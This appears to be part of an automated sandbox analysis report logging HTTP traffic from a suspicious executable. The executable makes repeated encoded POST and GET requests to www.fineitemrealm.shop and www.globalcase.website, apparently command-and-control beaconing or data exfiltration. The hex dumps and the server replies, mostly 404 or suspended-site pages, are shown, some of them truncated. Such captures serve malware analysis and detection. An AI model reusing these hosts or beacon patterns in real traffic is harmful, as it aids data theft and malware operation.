                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0; RCT6773W22B Build/LRX21M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Safari/537.36
                                                                                              Data Raw: 39 32 74 44 3d 37 56 53 7a 47 38 69 68 64 58 37 63 72 4e 6b 59 4a 35 4a 66 50 70 57 41 56 65 2b 70 72 33 4c 68 43 74 48 56 73 63 55 43 61 58 58 59 32 69 36 55 38 50 4e 49 43 6c 33 41 30 65 4a 30 35 4e 48 69 37 4e 65 6f 56 2f 72 39 52 73 68 78 49 50 44 6a 64 47 42 65 7a 38 78 79 59 68 53 59 2f 57 6e 64 59 6d 61 41 71 57 2f 39 46 52 55 6a 75 6f 4c 47 51 61 6b 34 44 51 6a 78 4d 70 66 30 50 48 4c 4e 48 57 36 70 71 78 67 77 31 35 76 66 6f 75 7a 57 6b 37 69 52 57 61 54 39 7a 7a 41 41 36 53 65 51 37 65 46 77 32 56 69 65 62 71 78 75 62 70 52 52 32 54 73 2f 4e 47 58 6f 55 58 32 4c 72 64 6a 35 7a 4f 35 57 70 41 6b 71 2b 52 6b 32 56 69 78 4c 68 4b 75 4b 38 51 55 3d
                                                                                              Data Ascii: 92tD=7VSzG8ihdX7crNkYJ5JfPpWAVe+pr3LhCtHVscUCaXXY2i6U8PNICl3A0eJ05NHi7NeoV/r9RshxIPDjdGBez8xyYhSY/WndYmaAqW/9FRUjuoLGQak4DQjxMpf0PHLNHW6pqxgw15vfouzWk7iRWaT9zzAA6SeQ7eFw2ViebqxubpRR2Ts/NGXoUX2Lrdj5zO5WpAkq+Rk2VixLhKuK8QU=
                                                                                              Feb 11, 2025 18:53:17.869371891 CET886INHTTP/1.1 404 Not Found
                                                                                              Server: nginx
                                                                                              Date: Tue, 11 Feb 2025 17:53:19 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Vary: Accept-Encoding
                                                                                              Last-Modified: Wed, 20 Mar 2024 08:46:13 GMT
                                                                                              ETag: W/"49d-614139f7d9e8f"
                                                                                              Content-Encoding: gzip
                                                                                              Data Raw: 32 34 62 0d 0a 1f 8b 08 00 00 00 00 00 02 03 ad 53 4d 73 da 30 10 bd e7 57 6c 9d b3 11 86 7c 21 8c 67 52 4c a6 9d 49 52 a6 38 93 f6 28 ec 05 6b 2a cb ae b5 c1 d0 4c ff 7b e5 0f 02 99 b6 e9 a5 f2 c1 d2 ee db f7 9e 34 bb fe bb f0 d3 34 fa 3a 9f 41 4a 99 82 f9 c3 fb db 8f 53 70 5c c6 1e 87 53 c6 c2 28 84 2f 1f a2 bb 5b f0 7a 7d 58 50 29 63 62 6c 76 ef 80 93 12 15 9c b1 aa aa 7a d5 b0 97 97 6b 16 7d 66 db 9a c5 ab cb ba ad 6b 9a 9a 5e 42 89 13 9c f8 8d c8 36 53 da 4c fe 40 e0 8d 46 a3 b6 ce a9 41 5c 09 bd 9e 38 a8 1d 78 d9 05 7e 8a 22 09 4e c0 2e 9f 24 29 0c 1e 71 69 24 21 2c 9e 4c 81 3a c1 c4 67 6d a2 05 65 48 02 6a 2d 17 bf 3f c9 cd c4 99 e6 9a 50 93 1b ed 0a 74 20 6e 4f 13 87 70 4b ac d6 1e 43 9c 8a d2 20 4d 1e a2 1b f7 ca 61 c7 44 5a 64 38 71 12 34 71 29 0b 92 b9 3e 62 88 52 69 a0 ea dc a4 c2 c0 12 51 83 d9 db ea bd 30 19 da 29 04 b2 fa 9d 6c 6c 8c d3 e6 ea b5 cc 93 1d 3c af 2c ad 6b e4 0f e4 de 59 b1 b5 a6 72 95 97 fc f4 b2 59 63 68 d2 2b 91 49 b5 e3 a2 94 c2 da ae a9 5c a1 e4 5a f3 d8 1a c2 72 fc [TRUNCATED]
                                                                                              Data Ascii: 24bSMs0Wl|!gRLIR8(k*L{44:AJSp\S(/[z}XP)cblvzk}fk^B6SL@FA\8x~"N.$)qi$!,L:gmeHj-?Pt nOpKC MaDZd8q4q)>bRiQ0)ll<,kYrYch+I\Zr3G1d\K_l_xnp.ky8h_4:%no1($k5^sp\R>likG*\O@h7=A!q`\In+F1IAi7;|S/X<,p5E:}CPX@mtS-clyQ%A()<6>k''0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              7192.168.2.450016162.210.195.109805580C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Feb 11, 2025 18:53:19.982322931 CET10835OUTPOST /c3c5/ HTTP/1.1
                                                                                              Host: www.fineitemrealm.shop
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US
                                                                                              Cache-Control: no-cache
                                                                                              Content-Length: 10301
                                                                                              Connection: close
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Origin: http://www.fineitemrealm.shop
                                                                                              Referer: http://www.fineitemrealm.shop/c3c5/
                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0; RCT6773W22B Build/LRX21M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Safari/537.36
                                                                                              Data Raw: 39 32 74 44 3d 37 56 53 7a 47 38 69 68 64 58 37 63 72 4e 6b 59 4a 35 4a 66 50 70 57 41 56 65 2b 70 72 33 4c 68 43 74 48 56 73 63 55 43 61 58 66 59 31 53 6d 55 39 70 46 49 44 6c 33 41 33 65 4a 78 35 4e 48 2f 37 4e 33 68 56 2f 33 74 52 6f 52 78 4a 74 4c 6a 4d 43 64 65 70 73 78 79 51 42 53 62 79 32 6d 41 59 6d 4b 45 71 57 76 39 46 52 55 6a 75 76 7a 47 5a 76 51 34 51 41 6a 79 62 5a 66 34 4c 48 4c 70 48 57 79 54 71 78 6b 4b 79 4a 50 66 6f 4f 6a 57 6e 4a 4b 52 65 61 54 37 30 7a 41 59 36 53 53 50 37 65 5a 57 32 56 48 44 62 6f 74 75 62 49 77 34 71 44 63 37 52 51 57 78 49 6b 75 72 6a 65 2f 76 38 70 31 71 34 56 77 69 74 54 59 6f 4f 41 51 54 79 66 71 49 75 45 77 53 2b 54 4d 35 58 4c 6c 64 51 75 63 68 6e 46 78 56 65 65 7a 37 37 4a 36 61 57 4b 6a 61 61 6e 31 53 4c 7a 48 73 54 4e 4c 38 52 53 37 4d 45 77 78 4c 55 75 65 69 56 73 64 6c 6f 32 41 4e 6b 55 4b 71 36 72 47 6f 5a 6f 66 73 4f 4f 32 2b 53 43 2b 50 57 6b 71 34 41 33 4c 6f 79 48 55 69 4d 67 6a 6c 78 57 70 53 54 58 49 49 53 69 74 59 36 77 67 48 30 30 66 37 6c [TRUNCATED]
                                                                                              Data Ascii: 92tD=7VSzG8ihdX7crNkYJ5JfPpWAVe+pr3LhCtHVscUCaXfY1SmU9pFIDl3A3eJx5NH/7N3hV/3tRoRxJtLjMCdepsxyQBSby2mAYmKEqWv9FRUjuvzGZvQ4QAjybZf4LHLpHWyTqxkKyJPfoOjWnJKReaT70zAY6SSP7eZW2VHDbotubIw4qDc7RQWxIkurje/v8p1q4VwitTYoOAQTyfqIuEwS+TM5XLldQuchnFxVeez77J6aWKjaan1SLzHsTNL8RS7MEwxLUueiVsdlo2ANkUKq6rGoZofsOO2+SC+PWkq4A3LoyHUiMgjlxWpSTXIISitY6wgH00f7lqBw/Pzjy29JHBSAy25avCBZ0Xi9GFkZbKhPu1Knf9JD82mr9enQhOkSqviwgkjDCJd4xL3X4P0vakrOiC+lPw0Z5BvTVlHO1BjNejqHXFudEGTtNqI0QDb8pfG13urBZ1Tz41Gm1qBFFqTpxJpZ+On/BBcNZjkQYmDNaqgmKgJxxHq10JvGkRGkE4a48jL5JYwpuS97chGe7suUZSrS3pxyu2sW05YihiXalrl5mmYDetqlma2NppAkd+NG0/4HPNPpkflpBsvIdDY+Y7f9rGRALPWQS+QbChdqcGZdkZCNsyjSs1eSG6eJhappBGKj3meQLRco0zGMZWgR/ISFmiRnc6qMHD3Q26A6k3MpPI/mKuStGvJlYG9wQbNxwAXMsBFgPm49ZQ9lPE6CNQZ5KSZM9FY4MPdwOAXhpeqr0igKg1Pucksq+s4uFKjbZkGEpGPlr/fFBT3AEbAFVdMIYVKOGp4kAt7Jt3Q1wQSC4nWUbW0pIB+gNH3aOayEVbQbtO+cXeb8rE8Dk3oPVEUy0nMol/j19AHiaEs1oL8q7aVrI2y7cTDK3Yzuqo5miGUEMjPE8R7ooj8wOk1WF3cj/Yf07Ap0NCGaKxK7U2zC9omY6aIytfK9x0+0R9Nsj5kRY8hgVQWDts2/l8NoQo2zmD4ehBuUn+cr9No [TRUNCATED]
                                                                                              Feb 11, 2025 18:53:20.442866087 CET886INHTTP/1.1 404 Not Found
                                                                                              Server: nginx
                                                                                              Date: Tue, 11 Feb 2025 17:53:22 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Vary: Accept-Encoding
                                                                                              Last-Modified: Wed, 20 Mar 2024 08:46:13 GMT
                                                                                              ETag: W/"49d-614139f7d9e8f"
                                                                                              Content-Encoding: gzip
                                                                                              Data Raw: 32 34 62 0d 0a 1f 8b 08 00 00 00 00 00 02 03 ad 53 4d 73 da 30 10 bd e7 57 6c 9d b3 11 86 7c 21 8c 67 52 4c a6 9d 49 52 a6 38 93 f6 28 ec 05 6b 2a cb ae b5 c1 d0 4c ff 7b e5 0f 02 99 b6 e9 a5 f2 c1 d2 ee db f7 9e 34 bb fe bb f0 d3 34 fa 3a 9f 41 4a 99 82 f9 c3 fb db 8f 53 70 5c c6 1e 87 53 c6 c2 28 84 2f 1f a2 bb 5b f0 7a 7d 58 50 29 63 62 6c 76 ef 80 93 12 15 9c b1 aa aa 7a d5 b0 97 97 6b 16 7d 66 db 9a c5 ab cb ba ad 6b 9a 9a 5e 42 89 13 9c f8 8d c8 36 53 da 4c fe 40 e0 8d 46 a3 b6 ce a9 41 5c 09 bd 9e 38 a8 1d 78 d9 05 7e 8a 22 09 4e c0 2e 9f 24 29 0c 1e 71 69 24 21 2c 9e 4c 81 3a c1 c4 67 6d a2 05 65 48 02 6a 2d 17 bf 3f c9 cd c4 99 e6 9a 50 93 1b ed 0a 74 20 6e 4f 13 87 70 4b ac d6 1e 43 9c 8a d2 20 4d 1e a2 1b f7 ca 61 c7 44 5a 64 38 71 12 34 71 29 0b 92 b9 3e 62 88 52 69 a0 ea dc a4 c2 c0 12 51 83 d9 db ea bd 30 19 da 29 04 b2 fa 9d 6c 6c 8c d3 e6 ea b5 cc 93 1d 3c af 2c ad 6b e4 0f e4 de 59 b1 b5 a6 72 95 97 fc f4 b2 59 63 68 d2 2b 91 49 b5 e3 a2 94 c2 da ae a9 5c a1 e4 5a f3 d8 1a c2 72 fc [TRUNCATED]
                                                                                              Data Ascii: 24bSMs0Wl|!gRLIR8(k*L{44:AJSp\S(/[z}XP)cblvzk}fk^B6SL@FA\8x~"N.$)qi$!,L:gmeHj-?Pt nOpKC MaDZd8q4q)>bRiQ0)ll<,kYrYch+I\Zr3G1d\K_l_xnp.ky8h_4:%no1($k5^sp\R>likG*\O@h7=A!q`\In+F1IAi7;|S/X<,p5E:}CPX@mtS-clyQ%A()<6>k''0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              8192.168.2.450017162.210.195.109805580C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Feb 11, 2025 18:53:22.522701979 CET452OUTGET /c3c5/?92tD=2X6TFJqSBkan8qpDKqB3foPaC+q2tUyYHYLE9NMufHiS9CuR8q99XAqJ5/x0mYnwttbXYsDuQMFmGta9SThVpupVHhzg9UTUXnuJin70LkdCs8vRTrMDdWY=&ODj=aVdxTb HTTP/1.1
                                                                                              Host: www.fineitemrealm.shop
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                              Accept-Language: en-US
                                                                                              Connection: close
                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0; RCT6773W22B Build/LRX21M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Safari/537.36
                                                                                              Feb 11, 2025 18:53:22.971740007 CET1236INHTTP/1.1 404 Not Found
                                                                                              Server: nginx
                                                                                              Date: Tue, 11 Feb 2025 17:53:24 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Content-Length: 1181
                                                                                              Connection: close
                                                                                              Vary: Accept-Encoding
                                                                                              Last-Modified: Wed, 20 Mar 2024 08:46:13 GMT
                                                                                              ETag: "49d-614139f7d9e8f"
                                                                                              Accept-Ranges: bytes
                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 57 65 62 73 69 74 65 20 53 75 73 70 65 6e 64 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 54 68 69 73 20 77 [TRUNCATED]
                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>Website Suspended</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> <meta name="description" content="This website has been suspended."/> <style type="text/css"> body {font-size:14px; color:#777777; font-family:arial; text-align:center;} h1 {font-size:84px; color:#99A7AF; margin: 70px 0 0 0;} h2 {color: #DE6C5D; font-family: arial; font-size: 20px; font-weight: bold; letter-spacing: -1px; margin: 15px 0 25px;} p {width:320px; text-align:center; margin-left:auto;margin-right:auto; margin-top: 30px } div {width:320px; text-align:center; margin-left:auto;margin-right:auto;} a:link {color: #34536A;} a:visited {color: #34536A;} a:active {color: #34536A;}
                                                                                              Feb 11, 2025 18:53:22.971755981 CET222INData Raw: 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 63 6f 6c 6f 72 3a 20 23 33 34 35 33 36 41 3b 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 53 55 53 50 45 4e 44 45 44 3c 2f 68 31 3e 0a
                                                                                              Data Ascii: a:hover {color: #34536A;} </style></head><body> <h1>SUSPENDED</h1> <h2>This website has been suspended.</h2> <div> Please contact the technical support department. </div></body></html>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              9192.168.2.450018192.64.118.221805580C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Feb 11, 2025 18:53:28.028462887 CET733OUTPOST /6wg4/ HTTP/1.1
                                                                                              Host: www.globalcase.website
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US
                                                                                              Cache-Control: no-cache
                                                                                              Content-Length: 201
                                                                                              Connection: close
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Origin: http://www.globalcase.website
                                                                                              Referer: http://www.globalcase.website/6wg4/
                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0; RCT6773W22B Build/LRX21M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Safari/537.36
                                                                                              Data Raw: 39 32 74 44 3d 54 30 61 4f 79 43 56 7a 61 34 75 6e 45 4f 68 6f 78 54 57 79 62 6e 63 39 35 72 6f 2f 2b 54 48 47 35 57 61 35 6e 45 78 59 4d 72 43 6e 68 4a 34 32 38 58 6f 4c 37 32 64 61 47 65 76 69 4b 63 44 54 72 6d 69 67 6d 43 34 39 69 4c 76 68 75 59 71 64 76 69 38 75 6c 2b 2f 49 58 30 39 62 61 48 37 70 42 50 43 53 55 55 52 4c 32 75 31 67 68 51 6e 67 4c 67 69 71 2b 7a 35 38 58 74 35 6c 70 61 55 69 33 42 4a 6c 4c 2b 55 4f 4c 64 6a 42 63 42 2f 32 6f 47 76 79 37 50 77 67 55 76 33 48 68 37 78 65 74 75 62 4a 5a 74 6c 53 5a 45 32 71 73 41 6b 49 7a 74 61 4b 34 55 72 74 41 6a 51 6c 6c 48 68 36 44 67 3d 3d
                                                                                              Data Ascii: 92tD=T0aOyCVza4unEOhoxTWybnc95ro/+THG5Wa5nExYMrCnhJ428XoL72daGeviKcDTrmigmC49iLvhuYqdvi8ul+/IX09baH7pBPCSUURL2u1ghQngLgiq+z58Xt5lpaUi3BJlL+UOLdjBcB/2oGvy7PwgUv3Hh7xetubJZtlSZE2qsAkIztaK4UrtAjQllHh6Dg==
                                                                                              Feb 11, 2025 18:53:28.707705021 CET533INHTTP/1.1 404 Not Found
                                                                                              Date: Tue, 11 Feb 2025 17:53:28 GMT
                                                                                              Server: Apache
                                                                                              Content-Length: 389
                                                                                              Connection: close
                                                                                              Content-Type: text/html
                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              10192.168.2.450019192.64.118.221805580C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Feb 11, 2025 18:53:30.576513052 CET753OUTPOST /6wg4/ HTTP/1.1
                                                                                              Host: www.globalcase.website
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US
                                                                                              Cache-Control: no-cache
                                                                                              Content-Length: 221
                                                                                              Connection: close
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Origin: http://www.globalcase.website
                                                                                              Referer: http://www.globalcase.website/6wg4/
                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0; RCT6773W22B Build/LRX21M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Safari/537.36
                                                                                              Data Raw: 39 32 74 44 3d 54 30 61 4f 79 43 56 7a 61 34 75 6e 46 71 64 6f 79 79 57 79 4c 33 64 50 6c 37 6f 2f 30 7a 48 43 35 57 57 35 6e 46 31 78 4d 5a 6d 6e 68 70 49 32 75 6d 6f 4c 34 32 64 61 4f 2b 76 6e 4f 63 44 49 72 6d 6d 43 6d 48 34 39 69 4c 37 68 75 5a 61 64 76 56 41 76 6b 75 2f 77 4a 55 38 39 48 33 37 70 42 50 43 53 55 51 35 74 32 75 4e 67 68 67 33 67 4b 42 69 31 69 6a 35 2f 42 64 35 6c 74 61 55 6d 33 42 4a 48 4c 2f 4a 62 4c 65 58 42 63 41 50 32 70 55 48 78 6f 76 77 69 61 50 32 73 77 4a 45 54 6e 37 2b 54 59 39 74 31 45 58 66 47 6b 6d 70 53 69 63 37 64 71 55 50 65 64 6b 5a 52 6f 45 63 7a 59 67 4a 69 65 67 2f 48 4d 39 50 48 7a 7a 4e 4d 57 44 2b 2b 67 49 41 3d
                                                                                              Data Ascii: 92tD=T0aOyCVza4unFqdoyyWyL3dPl7o/0zHC5WW5nF1xMZmnhpI2umoL42daO+vnOcDIrmmCmH49iL7huZadvVAvku/wJU89H37pBPCSUQ5t2uNghg3gKBi1ij5/Bd5ltaUm3BJHL/JbLeXBcAP2pUHxovwiaP2swJETn7+TY9t1EXfGkmpSic7dqUPedkZRoEczYgJieg/HM9PHzzNMWD++gIA=
                                                                                              Feb 11, 2025 18:53:31.257075071 CET533INHTTP/1.1 404 Not Found
                                                                                              Date: Tue, 11 Feb 2025 17:53:31 GMT
                                                                                              Server: Apache
                                                                                              Content-Length: 389
                                                                                              Connection: close
                                                                                              Content-Type: text/html
                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              11192.168.2.450020192.64.118.221805580C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Feb 11, 2025 18:53:33.131406069 CET10835OUTPOST /6wg4/ HTTP/1.1
                                                                                              Host: www.globalcase.website
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US
                                                                                              Cache-Control: no-cache
                                                                                              Content-Length: 10301
                                                                                              Connection: close
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Origin: http://www.globalcase.website
                                                                                              Referer: http://www.globalcase.website/6wg4/
                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0; RCT6773W22B Build/LRX21M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Safari/537.36
                                                                                              Data Raw: 39 32 74 44 3d 54 30 61 4f 79 43 56 7a 61 34 75 6e 46 71 64 6f 79 79 57 79 4c 33 64 50 6c 37 6f 2f 30 7a 48 43 35 57 57 35 6e 46 31 78 4d 5a 75 6e 68 61 41 32 2f 31 51 4c 32 57 64 61 41 65 76 6d 4f 63 43 53 72 6e 43 47 6d 48 45 44 69 4a 44 68 76 37 43 64 6e 45 41 76 74 75 2f 77 54 30 39 61 61 48 37 34 42 50 79 57 55 55 64 74 32 75 4e 67 68 6c 7a 67 61 67 69 31 67 6a 35 38 58 74 35 66 70 61 55 4f 33 42 52 39 4c 2f 4d 67 4c 6f 6e 42 63 67 66 32 76 68 7a 78 79 76 77 73 64 50 32 30 77 4a 5a 54 6e 2f 65 58 59 38 70 50 45 55 44 47 67 54 51 62 32 65 37 32 39 6b 6a 38 4e 33 70 67 68 48 74 7a 66 68 39 34 57 7a 48 35 58 66 2f 33 79 45 63 61 4d 78 53 55 35 49 46 72 69 70 43 37 64 79 70 49 47 43 71 44 74 45 56 47 68 31 6a 68 48 32 56 75 72 2b 5a 64 53 73 42 2f 45 72 68 37 4e 4a 55 44 69 4d 49 57 49 79 78 42 51 62 6a 35 69 56 52 38 65 4a 53 45 77 79 61 46 71 50 75 4b 37 69 71 6b 6e 6e 65 42 44 67 45 4e 67 63 57 4a 53 72 68 4f 4a 75 59 34 35 44 39 6a 4c 63 5a 76 2f 6e 4f 36 4a 4f 73 5a 4e 56 31 56 79 54 77 77 2b [TRUNCATED]
